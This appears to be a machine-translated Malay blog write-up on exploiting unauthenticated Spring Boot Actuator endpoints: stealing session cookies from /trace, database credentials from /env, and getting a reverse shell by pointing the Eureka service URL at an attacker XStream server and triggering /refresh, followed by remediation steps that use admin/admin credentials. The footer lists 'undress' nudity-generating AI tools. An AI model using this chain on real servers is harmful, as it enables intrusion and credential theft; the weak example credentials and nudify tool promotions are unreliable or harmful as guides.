


Contoh analisis akses Spring Boot Actuator yang tidak dibenarkan kepada getshell
Kata Pengantar
Bos jabatan menggali kelemahan ini dalam src tertentu Ia adalah lubang lama, saya fikir ia menarik, jadi saya menyediakan persekitaran tempatan untuk mengujinya.
Actuator ialah modul berfungsi yang disediakan oleh springboot untuk introspeksi dan pemantauan sistem aplikasi Dengan bantuan Actuator, pembangun boleh melihat dan mengumpul statistik pada penunjuk pemantauan tertentu sistem aplikasi. Apabila Actuator didayakan, jika kebenaran yang berkaitan tidak dikawal, pengguna yang menyalahi undang-undang boleh mendapatkan maklumat pemantauan dalam sistem aplikasi dengan mengakses titik akhir penggerak lalai, yang membawa kepada kebocoran maklumat atau bahkan pengambilalihan pelayan.
Actuator ialah modul berfungsi yang disediakan oleh Spring Boot, yang boleh digunakan untuk introspeksi dan pemantauan sistem aplikasi. Titik akhir pelaksana yang disediakan dibahagikan kepada dua kategori: titik akhir asli dan titik akhir sambungan yang ditentukan pengguna >
Gunakan env plus refresh untuk melaksanakan getshell
-
Gunakan jejak untuk mendapatkan maklumat pengesahan (Cookie, Tooken, Session), dan gunakan maklumat pengesahan untuk mengakses antara muka. -
env mungkin membocorkan kata laluan akaun pangkalan data (mangodb) Sudah tentu, rangkaian luaran mesti dibuka, jadi kemungkinannya kecil. -
Orang asing mengatakan bahawa pernyataan sql boleh dilaksanakan, tetapi saya belum faham lagi -
Kerentanan ditemui Biasanya kenal pasti rangka kerja yang digunakan oleh aplikasi web semasa sebagai rangka kerja springboot. Terdapat dua cara utama untuk menilai:
-
Halaman ralat lalai dilaporkan melalui rangka kerja springboot; jika Pembangun aplikasi web tidak mengubah suai halaman ralat 4xx dan 5xx lalai aplikasi web springboot. Kemudian apabila ralat 4xx atau 5xx berlaku dalam aplikasi web, ralat berikut akan berlaku dilaporkan (hanya halaman ralat 404 digunakan sebagai contoh di sini): Akses laluan yang dibina secara rawak , contohnya: http://172.26.2.24:8090/index Jika halaman ralat berikut muncul, ini bermakna tapak web web menggunakan rangka kerja springboot (kebanyakan situasi yang dihadapi dalam amalan adalah seperti ini).
-
Berdasarkan dua cara di atas untuk menentukan sama ada aplikasi web semasa ialah rangka kerja springboot, ia adalah untuk mengakses direktori yang berbeza untuk dilihat jika terdapat sebarang ikon kecil daun Hijau, dan kemudian cari cara untuk mencetuskan ralat 4xx atau 5xx aplikasi dalam direktori berbeza untuk melihat sama ada terdapat ralat Halaman Ralat Label Putih.
Mengeksploitasi kelemahan
Akses titik akhir /trace untuk mendapatkan maklumat penjejakan permintaan HTTP asas (cap masa, pengepala HTTP, dsb. Jika terdapat permintaan operasi daripada log-). dalam pengguna, anda boleh memalsukan kuki untuk log masuk.
Akses titik akhir /env untuk mendapatkan semua atribut persekitaran Memandangkan penggerak akan memantau perkhidmatan pangkalan data seperti mysql dan mangodb di tapak, kadangkala maklumat pangkalan data mysql dan mangodb boleh. diperoleh melalui maklumat pemantauan. Jika pangkalan data terbuka pada rangkaian awam, bahaya yang ditimbulkan adalah besar
Konfigurasi titik akhir /env yang tidak betul menyebabkan RCE > Prasyarat: Eureka -Pelanggan
Sebagai contoh, apabila menguji ralat json bahagian hadapan dan membocorkan nama pakej, gunakan netflix
Dua berikut diperlukan Pakej
spring-boot-starter-actuator (/refresh refresh konfigurasi diperlukan)
spring-cloud-starter-netflix- eureka-client (functional dependency)
Menggunakan python3 Untuk memulakan skrip, anda perlu memberi perhatian kepada dua tempat, satu ialah IP dan port untuk menerima shell, dan satu lagi ialah port skrip kami bermula,
eureka.client.serviceUrl.defaultZone=http://10.1.1.135:2333/xstream
Kemudian lawati /refresh, tangkap paket dan tukar permintaan get untuk Menyiarkan permintaan, data siaran adalah pilihan,
Kemudian dalam tetingkap nc kami, anda boleh melihat bahawa cangkerang telah berjaya dipantulkan semula.
Pembetulan kerentanan
Sebagai anjing keselamatan, anda tidak boleh hanya menggali tanpa membetulkan, dan memperkenalkan spring-boot di bawah pom projek. xml file -starter-security bergantung pada
<dependency> <groupid>org.springframework.boot</groupid><artifactid>spring-boot-starter-security</artifactid> </dependency>
Kemudian dayakan fungsi keselamatan dalam application.properties, konfigurasikan kata laluan akaun akses dan mulakan semula aplikasi untuk muncul.
management.security.enabled=true security.user.name=admin security.user.password=admin
Untuk melumpuhkan antara muka, anda boleh menetapkannya seperti berikut (seperti melumpuhkan antara muka env):
endpoints.env.enabled = false
Masalah
Orang asing mengatakan bahawa mereka boleh melaksanakan pernyataan sql tetapi mendapati bahawa mereka tidak boleh dilaksanakan Mungkin kaedahnya tidak betul tangkapan skrin gambarnya saya harap sesiapa yang berjaya melaksanakannya boleh berkongsi.
Dalam persekitaran sebenar, didapati terdapat banyak tiada penyegaran, mengakibatkan ketidakupayaan untuk melaksanakan arahan
Atas ialah kandungan terperinci Contoh analisis akses Spring Boot Actuator yang tidak dibenarkan kepada getshell. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Alat AI Hot

Undresser.AI Undress
Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover
Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool
Gambar buka pakaian secara percuma

Clothoff.io
Penyingkiran pakaian AI

Video Face Swap
Tukar muka dalam mana-mana video dengan mudah menggunakan alat tukar muka AI percuma kami!

Artikel Panas

Alat panas

SublimeText3 versi Mac
Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

mPDF
mPDF ialah perpustakaan PHP yang boleh menjana fail PDF daripada HTML yang dikodkan UTF-8. Pengarang asal, Ian Back, menulis mPDF untuk mengeluarkan fail PDF "dengan cepat" dari tapak webnya dan mengendalikan bahasa yang berbeza. Ia lebih perlahan dan menghasilkan fail yang lebih besar apabila menggunakan fon Unicode daripada skrip asal seperti HTML2FPDF, tetapi menyokong gaya CSS dsb. dan mempunyai banyak peningkatan. Menyokong hampir semua bahasa, termasuk RTL (Arab dan Ibrani) dan CJK (Cina, Jepun dan Korea). Menyokong elemen peringkat blok bersarang (seperti P, DIV),

DVWA
Damn Vulnerable Web App (DVWA) ialah aplikasi web PHP/MySQL yang sangat terdedah. Matlamat utamanya adalah untuk menjadi bantuan bagi profesional keselamatan untuk menguji kemahiran dan alatan mereka dalam persekitaran undang-undang, untuk membantu pembangun web lebih memahami proses mengamankan aplikasi web, dan untuk membantu guru/pelajar mengajar/belajar dalam persekitaran bilik darjah Aplikasi web keselamatan. Matlamat DVWA adalah untuk mempraktikkan beberapa kelemahan web yang paling biasa melalui antara muka yang mudah dan mudah, dengan pelbagai tahap kesukaran. Sila ambil perhatian bahawa perisian ini

Penyesuai Pelayan SAP NetWeaver untuk Eclipse
Integrasikan Eclipse dengan pelayan aplikasi SAP NetWeaver.

VSCode Windows 64-bit Muat Turun
Editor IDE percuma dan berkuasa yang dilancarkan oleh Microsoft
